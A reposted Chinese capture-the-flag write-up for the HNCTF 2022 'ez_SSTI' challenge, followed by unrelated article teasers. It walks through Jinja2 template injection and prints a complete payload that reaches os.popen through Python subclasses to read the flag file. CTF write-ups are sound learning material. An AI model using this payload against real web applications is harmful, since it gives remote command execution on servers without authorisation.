NSS [HNCTF 2022 WEEK2]ez_SSTI

2023-10-06 22:12

文章标签 2022 ez nss hnctf week2 ssti

本文主要是介绍NSS [HNCTF 2022 WEEK2]ez_SSTI，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

NSS [HNCTF 2022 WEEK2]ez_SSTI

开题，已经提示了是SSTI

参数是name，测试得出模板是jinja2。

先跑一下fuzz。字典在我博客CTFshow的SSTI那篇。

看了一下，貌似没过滤。

六种执行命令方式我们选择eval执行命令。其他几种也行。

找os._wrap_close类。定位到了137

{{''.__class__.__bases__[0].__subclasses__()}}

payload：（flag在当前目录下）

?name={{''.__class__.__bases__[0].__subclasses__()[137].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("tac flag").read()')}}

这篇关于NSS [HNCTF 2022 WEEK2]ez_SSTI的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

http://www.chinasem.cn/article/154213。 23002807@qq.com

上海大学《2022年836+915自动控制原理真题及答案》 (完整版）

Part1：2022年上海大学真题题目学硕836 专硕915 Part2：2022年上海大学真题答案学硕836 专硕915

【算法 2022】高效有用的机器学习算法和 Python 库

2022年已经到来，在此祝大家虎年大吉！2022年，下面几种机器学习算法和 Python 库将在未来更受欢迎！让我们花个几分钟一起来了解下：一、CatBoost CatBoost 可能是最新的算法，因为它随着越来越流行而不断更新。这个机器学习算法对于处理分类数据的数据科学家特别有用。您可以考虑 Random Forest 和 XGBoost 算法的优点，CatBoost 具有它们的大部分优点

$【数据分享】2000-2022年我国省市县三级的逐月O3数据（免费获取\excel\shp格式）$

【数据分享】2000-2022年我国省市县三级的逐月O3数据（免费获取\excel\shp格式）

空气质量数据是在我们日常研究中经常使用的数据！之前我们给大家分享了2000-2022年的省市县三级的逐月PM2.5数据、2013-2022年的省市县三级的逐月CO数据、2013-2022年的省市县三级的逐月SO2数据、2008-2022年我国省市县三级的逐月NO2数据和2000—2022年的省市县三级的逐月PM10数据（均可查看之前的文章获悉详情）！本次我们分享的是我国2000—2022年的省

$【数据分享】2000-2022年我国省市县三级的逐日O3数据（免费获取\excel\shp格式）$